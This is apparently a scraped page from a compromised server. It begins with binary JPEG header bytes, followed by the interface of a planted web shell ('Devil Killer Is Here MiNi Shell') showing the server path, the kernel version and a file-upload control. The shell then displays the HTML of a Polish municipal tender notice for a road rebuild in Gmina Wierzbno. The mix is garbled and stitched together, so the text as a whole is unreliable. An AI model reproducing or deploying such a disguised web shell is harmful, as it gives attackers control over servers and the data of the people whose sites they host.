JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220228/0007069501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi gminnej nr 420918W Wyględówek - Nadzieja, od km 0+498 do km 1+497, na długości 0,999 km, w miejscowościach Wyględówek i Nadzieja, Gmina Wierzbno </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Wierzbno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711582210</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">brak</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wierzbno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-111</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL925 - Siedlecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">25 793 44 95</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">25 793 45 72</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@gminawierzbno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminawierzbno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi gminnej nr 420918W Wyględówek - Nadzieja, od km 0+498 do km 1+497, na długości 0,999 km, w miejscowościach Wyględówek i Nadzieja, Gmina Wierzbno </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cf77fa3d-9868-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00070695</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00033227/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Przebudowa drogi gminnej nr 420918W Wyględówek - Nadzieja, od km 0+498 do km 1+497, na długości 0,999 km, w miejscowościach Wyględówek i Nadzieja gmina Wierzbno</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> ezamowienia.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">miniportal.uzp..gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, <br/> elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich <br/> użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach <br/> korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/> z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem <br/> danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia <br/> dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz.U.UE L119 z dnia 4 maja 2016r. <br/> str. 1; zwanym dalej „RODO”) informujemy, że:<br/> 1) administratorem Pani/Pana danych osobowych jest Wójt Gminy Wierzbno, adres <br/> Wierzbno 90, 07-111 Wierzbno, tel. 25 793 44 95,<br/> 2) administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować <br/> pod adresem e-mail: iodwierzbno@interia.pl,<br/> 3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/> związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, <br/> prowadzonym w trybie podstawowym,<br/> 4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona <br/> zostanie dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P,<br/> 5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 p.z.p. przez okres 4 <br/> lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania <br/> umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,<br/> 6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczą- <br/> cych jest wymogiem ustawowym określonym w przepisanych ustawy p.z.p. związanym z <br/> udziałem w postępowaniu o udzielenie zamówienia publicznego,<br/> 7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/> zautomatyzowany, stosownie do art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania <br/> danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówie- <br/> nia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO <br/> (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do <br/> przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w <br/> celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy <br/> interesu publicznego Unii Europejskiej lub państwa członkowskiego);</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SG.271.1.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia publicznego jest przebudowa drogi gminnej nr 420918W <br/> Wyględówek - Nadzieja, od km 0+498 do km 1+497, na długości 0,999 km, w <br/> miejscowościach Wyględówek i Nadzieja, w gminie Wierzbno. Przebudowa odbywa się na <br/> odcinku od istniejącej nawierzchni mineralno asfaltowej w Wyględówku, do końca <br/> nawierzchni utwardzonej kruszywem łamanym.<br/>2. W zakres inwestycji objętej niniejszym zgłoszeniem wchodzą następujące roboty:<br/> • pielęgnacja drzew i wycinka krzaków, będących w kolizji,<br/> • usunięcie zawyżonych poboczy i zalegającego humusu,<br/> • rozbiórka i wykonanie nowej podbudowy z kruszywa łamanego w miejscu połączenia z <br/> istniejącą nawierzchnią mineralno-asfaltową,<br/> • korekta profilu poprzecznego i podłużnego jezdni drogi kruszywem łamanym,<br/> • regulacja wysokościowa kolidujących elementów,<br/> • wykonanie nawierzchni jezdni z dwóch warstw masy mineralno asfaltowej,<br/> • wykonanie poboczy z kruszywa łamanego,<br/> • montaż znaków pionowych,<br/> • budowa kanału technologicznego<br/>3. Szczegółowy zakres i wielkość zamówienia przedstawione zostały w dokumentacji <br/> projektowej oraz przedmiarze robót stanowiących załącznik nr 7 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233300-2 - Fundamentowanie autostrad, dróg, ulic i ścieżek ruchu pieszego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą łączną ilość punktów z sumowanych ocen kryteriów. Punkty obliczane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu na <br/> zasadach określonych w Rozdziale VIII SWZ oraz spełniają określone przez Zamawiającego <br/> warunki udziału zamieszczone poniżej.<br/>2. O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki dotyczące:<br/> 1) zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/> 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/> wynika to z odrębnych przepisów:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/> 3) sytuacji ekonomicznej lub finansowej:<br/> Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że <br/> a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności <br/> związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż wartość <br/> brutto złożonej oferty lub dla walut obcych na kwotę w wysokości równoważnej liczonej <br/> według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP <br/> obowiązującego w dniu, w którym zamieszczone zostało ogłoszenie o niniejszym <br/> zamówieniu w Biuletynie Zamówień Publicznych.<br/> b) posiada środki finansowe lub zdolność kredytową na kwotę w wysokości minimum <br/> 700.000,00zł<br/> 4) zdolności technicznej lub zawodowej:<br/> Wykonawca spełni warunek, jeżeli wykaże, że <br/> a) dysponuje co najmniej 1 osobą, która będzie uczestniczyć w wykonywaniu zamówienia - <br/> odpowiedzialną za kierowanie robotami budowlanymi, posiadającą uprawnienia do <br/> kierowania robotami budowlanymi w specjalności drogowej, <br/> b) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres <br/> prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 2 <br/> roboty budowlane, które polegały na budowie lub przebudowie drogi o nawierzchni <br/> bitumicznej o wartości co najmniej 500.000 zł każda z robót oraz załączy dowody <br/> określające, czy roboty zostały wykonane w sposób należyty i wskazujące czy zostały <br/> wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca <br/> nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, <br/> wystawione nie wcześniej niż 3 miesiące przed jego złożeniem,<br/> 2) zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu <br/> Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki <br/> terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca <br/> nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. <br/> 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, <br/> 3) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym <br/> mowa w art. 125 ust. 1 p.z.p. w zakresie odnoszącym się do podstaw wykluczenia <br/> wskazanych w art. 108 ust. 1 pkt 3-6 p.z.p. oraz w zakresie podstaw wykluczenia <br/> wskazanych w art. 109 ust. 1 pkt 1 p.z.p.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/> 1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do <br/> tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie <br/> konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), <br/> 2) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca <br/> nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, <br/> wystawione nie wcześniej niż 3 miesiące przed jego złożeniem,<br/> 3) zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu <br/> Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki <br/> terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca <br/> nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. <br/> 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, <br/> 4) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/> Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzo- <br/> nych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają <br/> wpisu do rejestru lub ewidencji;<br/> 5) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli <br/> okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami <br/> budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, <br/> daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane oraz <br/> załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, <br/> 6) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w <br/> szczególności odpowiedzialnych za obsługę specjalistycznego sprzętu, kontrolę jakości lub <br/> kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji <br/> zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania <br/> zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz <br/> informacją o podstawie do dysponowania tymi osobami,<br/> 7) dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności <br/> cywilnej w zakresie prowadzonej działal¬ności związanej z przedmiotem zamówienia na <br/> sumę gwarancyjną nie mniejszą niż wartość brutto złożonej oferty; <br/> 8) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej <br/> wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w <br/> okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości 10.000,00 zł przed upływem terminu <br/> składania ofert określonego w niniejszej SWZ<br/>2. Wadium może być wnoszone w jednej lub w kilku następujących formach:<br/> a) pieniądzu;<br/> b) gwarancjach bankowych;<br/> c) gwarancjach ubezpieczeniowych; <br/> d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z <br/> dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. <br/> z 2020 r. poz. 299 ze zm.).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy 79 9236 0008 0390 <br/> 0853 2000 0220 BS w Węgrowie O/Wierzbno z adnotacją- „Wadium w postępowaniu na <br/> przebudowę drogi gminnej nr 420918W Wyględówek - Nadzieja, od km 0+498 do km 1+497, <br/> na długości 0,999 km, w miejscowościach Wyględówek i Nadzieja, Gmina Wierzbno”<br/>4. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych <br/> na rachunek bankowy, o którym mowa w ust. 3, przed upływem terminu składania ofert.<br/><br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji <br/> lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/> 1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium <br/> przez Wykonawcę określone w ustawie p.z.p. <br/> 2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty <br/> wadium;<br/> 3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/> 4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania <br/> ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/> 5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego <br/> postępowania;<br/> 6) beneficjentem poręczenia lub gwarancji jest: Gmina Wierzbno<br/> 7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/> Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią wszystkich <br/> Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązanych z tytułu <br/> poręczenia lub gwarancji lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców <br/> wspólnie ubiegających się o udzielenie zamówienia (konsorcjum); <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku <br/> Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do <br/> reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo <br/> winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadcze – <br/> nia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia <br/> te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w <br/> jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadcze – <br/> nie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do 